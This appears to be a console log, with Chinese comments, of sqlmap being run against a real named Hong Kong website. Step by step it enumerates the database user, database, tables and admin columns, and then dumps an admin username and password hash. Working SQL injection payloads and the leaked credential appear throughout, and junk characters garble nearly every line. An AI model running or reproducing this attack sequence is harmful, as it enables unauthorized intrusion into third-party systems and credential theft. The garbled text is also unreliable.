D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! {3 @6 J! n+ z G4 O: {, B1 {; yms "Mysql" --current-user /* 注解:获取当前用户名称
# }3 m. O/ j& ~ x! n sqlmap/0.9 - automatic SQL injection and database takeover tool
7 s( A i- H, I http://sqlmap.sourceforge.net starting at: 16:53:54
4 ?0 R; t# O3 {6 W0 F9 z4 _* i& U[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 Z& R: M! b7 b% S7 V2 J$ P( v
session file
* l. d2 _) M, U& ^/ j[16:53:54] [INFO] resuming injection data from session file; b' ^4 F0 C& s1 P* K
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 K/ x7 u0 R' i1 z! v6 E3 ][16:53:54] [INFO] testing connection to the target url! z' j2 ]2 R( M" U$ L M- n# X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ L( `0 G2 C& S& ^( ~) y$ m
sts:( x- d" d& q A8 A; K$ Q
---1 P! j( D) L- L3 Q- @2 Q. W
Place: GET
6 y0 P& w6 x- E5 CParameter: id
8 {& H j9 \3 T8 q x0 d Type: boolean-based blind: Q/ k" [. ~! M7 [% X2 ?) k
Title: AND boolean-based blind - WHERE or HAVING clause5 [: |9 Y- W8 ^' N0 `$ [
Payload: id=276 AND 799=799! ?1 o( l2 v2 l! i w! X; _! R, m8 \3 ~
Type: error-based
/ y8 e. `* y |& @* a Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 C6 G8 j- r7 v! E Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; n! ^* c" l+ S) X& O
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
J7 n2 k& d+ v& T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 S! Y% t" E" D( Z9 {& b7 ?
Type: UNION query
* E9 r% R" b: \+ r Title: MySQL UNION query (NULL) - 1 to 10 columns: d+ O, }7 O6 s0 |
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( }+ Q+ z6 ] c4 x) ?' K) W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 F( ?: V' t- ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% @' ]0 r6 k w
Type: AND/OR time-based blind, {6 M9 A+ u4 n5 B j& p0 Q4 l; C
Title: MySQL > 5.0.11 AND time-based blind' h+ g4 O- A: x/ a+ R1 H+ z! j
Payload: id=276 AND SLEEP(5)$ ^+ Z4 L( V* u6 _( d% m( D. ^
---; o( v5 p6 k: F4 E/ j* ]/ _0 B
[16:53:55] [INFO] the back-end DBMS is MySQL
; A9 N9 i8 Y# }2 U7 Mweb server operating system: Windows1 ^; g, {6 s1 F( g+ N! J: J
web application technology: Apache 2.2.11, PHP 5.3.0/ V6 a0 d; _( c3 n% \8 `
back-end DBMS: MySQL 5.0
3 }& V' E& ?, ]- I$ Z3 T[16:53:55] [INFO] fetching current user0 N# x$ z6 J# k% [9 _: F6 Z
current user: 'root@localhost'
3 j) K/ z: e, Y1 |1 z% c[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ [9 ^, ]! J1 E% U! m# R
tput\www.wepost.com.hk' shutting down at: 16:53:58
4 _. }" V) g2 x1 I2 m- f) w; q
" @6 {3 \1 j8 R. K7 uD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: |; M/ j a+ N {- {& b& r
ms "Mysql" --current-db /*当前数据库, J# O9 D ?" c4 N! J0 s: q/ \
sqlmap/0.9 - automatic SQL injection and database takeover tool2 y9 s- P1 Y: ^
http://sqlmap.sourceforge.net starting at: 16:54:16
- K1 l2 _- G- ~& E' x0 S! l3 ][16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
p& [, t; r. G | session file) G# v0 I3 J5 Y, @# c5 `
[16:54:16] [INFO] resuming injection data from session file
+ O% d: v: Y. d2 |; z3 @& x9 t[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: U+ m7 o* v% G% v' D[16:54:16] [INFO] testing connection to the target url
4 e/ w; x; v) T* W3 G1 }sqlmap identified the following injection points with a total of 0 HTTP(s) reque$ h: u/ W* e; m
sts:8 p$ S6 a/ }3 M5 V2 t1 m4 S
---
; g6 I1 o3 X% m: w+ sPlace: GET
8 L7 j+ }" T. T5 w6 qParameter: id5 m$ X; g( q- `
Type: boolean-based blind
2 m5 q: d# y7 M% S8 i j$ A) `1 u/ q Title: AND boolean-based blind - WHERE or HAVING clause% I* i/ i _1 Q7 V# _
Payload: id=276 AND 799=799* }0 Q7 S# J. G7 }
Type: error-based% U5 B8 a& ?3 G8 ?4 l6 f- \, Q
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( `& d% G0 ]) g: M& j% e6 Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( f, d2 ?3 p3 E6 `' I1 Z4 ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. |3 `5 i; V" n) x; ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 d, E6 i: X3 t7 z: s# g5 o
Type: UNION query
8 W$ u4 J5 G. a q Title: MySQL UNION query (NULL) - 1 to 10 columns
7 L1 ^3 X# ~6 p r$ b) I Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 ^ Y: l7 k* d) k$ o9 @. j6 g. {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ V7 v+ P* X8 w0 v# Q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 v; Z8 r5 M& o4 w2 z" | Type: AND/OR time-based blind
g2 b3 E/ j: i2 n0 m Title: MySQL > 5.0.11 AND time-based blind
( A; i6 j1 Y1 _8 I! R/ W& W; \! n Payload: id=276 AND SLEEP(5)
6 V1 X/ l O% }: j+ X" w---
2 h! m$ h% ^" Q) f[16:54:17] [INFO] the back-end DBMS is MySQL
1 B k2 L) u' N; q1 x( R- k7 Pweb server operating system: Windows
: R0 d7 b% A* X" O, }web application technology: Apache 2.2.11, PHP 5.3.0/ a- J3 `3 e4 l* p- F5 z" a" Y
back-end DBMS: MySQL 5.00 f2 e/ f+ E6 O: m* a& a
[16:54:17] [INFO] fetching current database
3 D! ]7 [( ~- g9 v8 Ocurrent database: 'wepost'2 G6 Y/ ?/ ~- n+ N* q* ?6 @
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou% x. ^* V1 D& s$ e8 T" ], ~
tput\www.wepost.com.hk' shutting down at: 16:54:18
4 H+ c/ g3 c2 r H8 }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db M& R; @! a9 r/ M% q" f! V
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名* S6 ]: c" h& w
sqlmap/0.9 - automatic SQL injection and database takeover tool
. ~7 P6 p4 {, R8 q. ~0 R9 p http://sqlmap.sourceforge.net starting at: 16:55:250 |; W4 G- d1 w( m
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
7 ?- V8 w; ]) X) |: ?& p) K1 ^0 ^2 z session file
* i# R' z% \4 _[16:55:25] [INFO] resuming injection data from session file
7 i! ?$ c; d; g! ~5 ]( M[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file4 R' J; B0 \! Y0 u2 m7 c
[16:55:25] [INFO] testing connection to the target url
+ c1 N8 I. u4 O% P6 B* w8 R* xsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 A! s7 ^* A+ X' z
sts:
4 H' p$ G* `( [- B+ d---& L; r/ s6 ]) N8 H* i$ s6 o' o$ j
Place: GET- y& N p3 J2 I0 r; y* r: ~& w: z
Parameter: id0 N9 k6 [8 t- v* v0 G- H7 f' [8 u
Type: boolean-based blind; O* t# a7 X# h+ L9 N2 |
Title: AND boolean-based blind - WHERE or HAVING clause; m. v3 v) f8 L& s/ r
Payload: id=276 AND 799=799
. q- k4 ^4 t- o3 J+ F/ c X- p' n# M( B Type: error-based4 g- Z8 v& ^! p F. `
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' k- W; l" S5 X
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" z( g2 F% Y3 |* y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 J! U+ I8 `" @1 v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% Z3 k2 U" R5 l
Type: UNION query
( J0 i5 ]. K# i9 ?: A: a: e9 y# y( ` Title: MySQL UNION query (NULL) - 1 to 10 columns
8 ~: J% Z! a% k8 n Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 J3 \) p5 V- a2 p7 }5 K(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; |3 T1 u3 a0 D0 f7 ]5 B
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 b# Q6 l M& I: T- d
Type: AND/OR time-based blind
5 H4 y$ F. J5 v0 f5 t* H1 R) @6 Q Title: MySQL > 5.0.11 AND time-based blind7 {7 e2 B x) W: @: j1 k# j1 f
Payload: id=276 AND SLEEP(5)
3 Q8 D& H! E( I) v; ~1 \---3 x) `. O* R1 G0 ]3 m7 k& l
[16:55:26] [INFO] the back-end DBMS is MySQL% N6 q; e6 p- A
web server operating system: Windows$ _% V1 h9 N: R! Y4 Q; B7 G8 u
web application technology: Apache 2.2.11, PHP 5.3.0
' u h3 d! [* {( Y& pback-end DBMS: MySQL 5.0
+ Y+ b) L- A) r$ ~" j[16:55:26] [INFO] fetching tables for database 'wepost'
4 r, F5 P3 v3 D- p[16:55:27] [INFO] the SQL query used returns 6 entries
4 D/ ]" W7 V! W+ A6 hDatabase: wepost, q2 K* ~7 f+ \5 l
[6 tables]0 B. r8 ^6 {0 S$ d5 N2 X4 x0 B
+-------------+
5 y9 ~8 m; K$ @/ P| admin |
: i; \# U' |' L z| article |- q% P' m" F- l9 z" _- _
| contributor |; E. n* x3 o j4 K, K
| idea |
6 N4 S9 r5 S8 \, d+ f| image |
3 V% I8 `0 U5 T* D: r& n0 t1 R| issue |
3 q+ G# q! I/ C9 e+-------------+
% `- G o/ V: P/ @( Y. T. u[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, Z* X- u! N5 f1 R7 stput\www.wepost.com.hk' shutting down at: 16:55:33
/ I8 q x3 H. q( g' \
& x! `% w+ L9 p AD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 U6 m) n: s g- n+ u
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名7 [# ], {$ V3 x; P5 i+ z) p
sqlmap/0.9 - automatic SQL injection and database takeover tool% \% E! v1 x# Y" X+ \3 v- L+ w% e
http://sqlmap.sourceforge.net starting at: 16:56:063 M6 c( k+ C) P- @. G: Q" J, c
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ \/ W% N0 e1 W( p1 I
sts:
Z* {6 P+ z x---, _. C4 C$ e: `/ u+ z' H9 {4 T
Place: GET: j% S3 y- k4 l; E0 B( f; h& A
Parameter: id
# |* V1 ]9 G/ L$ n! C* o1 D Type: boolean-based blind
' o( w: q/ r) x F% a Title: AND boolean-based blind - WHERE or HAVING clause
! y6 T T9 @. M3 c6 ] Payload: id=276 AND 799=799
) p! _: b( ]( h' V$ f) e! k Type: error-based& y0 n$ _! Q9 i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ q3 c8 k' p6 w' [* ~: i. l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 P8 I2 O( g. n+ h! @& ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ t2 \7 P3 ]& |9 k/ Q: q% I
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 W% w8 s5 t) {5 G Q Type: UNION query* c, g' B/ C) F) l9 b
Title: MySQL UNION query (NULL) - 1 to 10 columns0 y# }) q Y. M+ f7 d! S/ c0 e! b
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& u$ `8 j$ s% d1 M7 Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ j1 m$ D; h' ~, fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 X# j& ~* {. U4 K7 M
Type: AND/OR time-based blind
$ T# q1 O3 \3 Y0 @5 f! y- A Title: MySQL > 5.0.11 AND time-based blind
6 ^- t* s6 K) Q2 b% N. n8 C Payload: id=276 AND SLEEP(5)
4 r9 {/ Z8 C+ u* b, E# ]" {---
+ U; G5 t' K# w" b* Q( Oweb server operating system: Windows/ d. b5 ?: z. r* k
web application technology: Apache 2.2.11, PHP 5.3.0# a+ c2 V3 b6 n* S( O1 Q
back-end DBMS: MySQL 5.0% Z* ], p0 q6 Z* D1 E9 f f
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se! Q H7 n- O4 @% p3 ~5 c( {
ssion': wepost, wepost
0 @0 ^2 z$ k0 |) PDatabase: wepost
+ N/ L% ]" t! l7 X, iTable: admin1 {# c7 j/ g0 ?& l- G
[4 columns]
9 r8 |) H. Y6 Q- b8 I+----------+-------------+
2 c4 v0 x9 Q: L. M3 J| Column | Type |: ] P/ d/ N; t5 u# {: w
+----------+-------------+
7 k2 B4 C, H' R9 x# N/ L* \' X| id | int(11) |
' z8 n5 } V( @| password | varchar(32) |7 K) m9 }* W: S& |6 C% d9 k
| type | varchar(10) |: j+ _4 w( F& S0 U1 _
| userid | varchar(20) |
4 }1 A& `# ^2 b+----------+-------------+
" l/ r+ o- G. h4 j# z) ?9 H shutting down at: 16:56:19# p) j$ _( E2 c6 v9 s
' a) X9 g5 f* @# M3 f4 RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db% K" B6 ?: ^" n0 c8 P
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
. P4 ?5 H' Z: I' x/ V sqlmap/0.9 - automatic SQL injection and database takeover tool- ~( d+ v( v/ e& w- ]7 F+ E
http://sqlmap.sourceforge.net starting at: 16:57:14* Y) q" O4 I4 T; W! T" }9 q, u
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 w, L6 S4 O1 R7 Z, J4 ~- Z, O+ W
sts:- N- n' e* ?) k; e- W; o3 c7 ^2 a
---
( A; D! t& l! T2 KPlace: GET7 U& |9 k( X( _) J% @. p! b
Parameter: id5 y& Q6 O8 A) I2 D7 q' x
Type: boolean-based blind _2 M, `2 E9 T3 W7 b; r6 _
Title: AND boolean-based blind - WHERE or HAVING clause
6 s0 {: s ~+ U* z1 J+ M Payload: id=276 AND 799=799+ a0 P1 n& {% [; J8 g9 I
Type: error-based9 N0 i( G& v: f/ V: }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 B+ \+ z P2 N) m0 e
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, o$ Q+ S$ _- C+ D0 C
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" M0 Q+ P' V2 T3 V6 z8 {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) H# a. }2 [( O \* Q1 ]! X
Type: UNION query
( t6 r+ l5 g4 V Title: MySQL UNION query (NULL) - 1 to 10 columns- `+ X; L+ U' O! O
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* ?+ `2 w( c. \- g" S(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& h% ~5 M8 g* E9 M: F' }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% S- p( J; i6 B& q6 ]" \ Type: AND/OR time-based blind( m. j+ B7 D# {! k8 G4 G U) j; \
Title: MySQL > 5.0.11 AND time-based blind1 l3 p. d" C" s+ C: Y2 q
Payload: id=276 AND SLEEP(5)$ T( M7 N9 @9 o0 p6 I/ A0 V& N8 w. ]8 m
---
* J& A) u$ f2 x" g6 s& eweb server operating system: Windows* ~5 y8 W2 F$ p( g$ e" m% J
web application technology: Apache 2.2.11, PHP 5.3.0
( _1 B7 V) F* eback-end DBMS: MySQL 5.0
1 F( |; a# L9 k: o" q2 O6 l- c7 Erecognized possible password hash values. do you want to use dictionary attack o6 D" Y+ o- L& \& i
n retrieved table items? [Y/n/q] y
. a5 u! L1 b5 ]( N3 ~- C' Y c) U3 Pwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]0 f4 R6 C+ _/ F3 R% o6 o9 g- r
do you want to use common password suffixes? (slow!) [y/N] y) W2 f6 {0 E# `; R2 ?9 g) Y, y
Database: wepost
) ]" n; L9 g2 i6 l+ @$ }Table: admin
w- W& ~* U6 s4 d2 g[1 entry]
" ^# ~$ F: x7 X) i& ?* S+----------------------------------+------------+
* p% _4 s6 z& I2 J: x" d| password | userid | Z; f0 f ~4 m6 C
+----------------------------------+------------+7 A& t' ~/ {1 ^/ F
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" t# K1 a% q. g; s. h9 s
+----------------------------------+------------+$ K2 V$ G0 C% f& j- T1 d$ m
shutting down at: 16:58:14! I, z, W9 E, h) X4 z1 q
: j( y8 T5 a. b2 K# |1 a! x: ND:\Python27\sqlmap> |